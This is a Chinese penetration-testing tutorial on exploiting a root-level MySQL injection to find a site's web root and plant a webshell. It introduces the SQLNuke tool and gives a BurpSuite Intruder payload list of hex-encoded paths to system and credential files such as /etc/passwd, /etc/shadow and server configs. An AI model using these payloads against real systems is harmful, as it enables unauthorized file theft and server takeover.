|
所有话题标签: |
0x01 前言
相信很多人在渗透测试过程中都有遇到过这种情况:一个MySQL Root高权限注入点,也具备读取和写入权限,这时只需要找到网站绝对路径就可以写入Webshell了,但如果利用所有已知方法还是找不到网站绝对路径呢?这节我将给大家介绍一款注入辅助工具和BurpSuite利用方式。
0x02 SQLNuke工具介绍
https://github.com/nuke99/sqlnuke
sql.rb //主程序config.yml //配置文件lib/ //基础库目录output/ //输出目录inputs/packset.lst //字典文件class/methods.rb //类文件
root@Jacks:~/sqlnuke-master# ./sql.rb -h-u, --url URL Link with 'XxxX' ex: http://tar.com/?id=1+UNION+SELECT+1,XxxX,2---d, --data DATA POST DATA ex: id=-1+Union+Select+null,XxxX,null--&name=John-x, --hex Hex Conversion--proxy http://IP:PORT HTTP Proxy--os (linux,win) Target Server OS (linux,win)--agent AGENT User-Agent for the header--ref REFERER Referer for the header--cookie COOKIE Cookie for the header-h, --help Information about commands

0x03 利用BurpSuite测试
http://wiki.apache.org/httpd/DistrosDefaultLayout
-
BurpSuite-> Intruder -> Payloads->Payload Processing->Add->Encode(Encode as ASCII hex)
0x2F6574632F7061737377640x2F6574632F736861646F770x2F6574632F67726F75700x2F6574632F686F7374730x2F6574632F617061636865322F6C6F67732F6163636573732E6C6F670x2F6574632F68747470642F6163636573732E6C6F670x2F6574632F696E69742E642F6170616368652F68747470642E636F6E660x2F6574632F696E69742E642F617061636865322F68747470642E636F6E660x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E660x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E660x2F686F6D652F6170616368652F68747470642E636F6E660x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E660x2F6F70742F6170616368652F636F6E662F68747470642E636F6E660x2F6574632F68747470642F68747470642E636F6E660x2F6574632F68747470642F636F6E662F68747470642E636F6E660x2F6574632F6170616368652F6170616368652E636F6E660x2F6574632F6170616368652F68747470642E636F6E660x2F6574632F617061636865322F617061636865322E636F6E660x2F6574632F617061636865322F68747470642E636F6E660x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E660x433A5C626F6F742E696E690x433a5c77616d705c62696e5c6170616368655c6c6f67735c6163636573732e6c6f670x433a5c77616d705c62696e5c6d7973716c5c6d7973716c352e352e32345c77616d707365727665722e636f6e660x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c68747470642e636f6e660x433a5c77616d705c62696e5c6170616368655c617061636865322e322e32325c636f6e665c77616d707365727665722e636f6e660x433a5c70687053747564795c4170616368655c636f6e665c68747470642e636f6e660x433a5c77696e646f77735c73797374656d33325c696e65747372765c4d657461426173652e786d6c





本文分享自微信公众号 - 潇湘信安(xxxasec)。
如有侵权,请联系 support@oschina.cn 删除。
本文参与“OSC源创计划”,欢迎正在阅读的你也加入,一起分享。
来源:oschina
链接:https://my.oschina.net/u/4893497/blog/4865384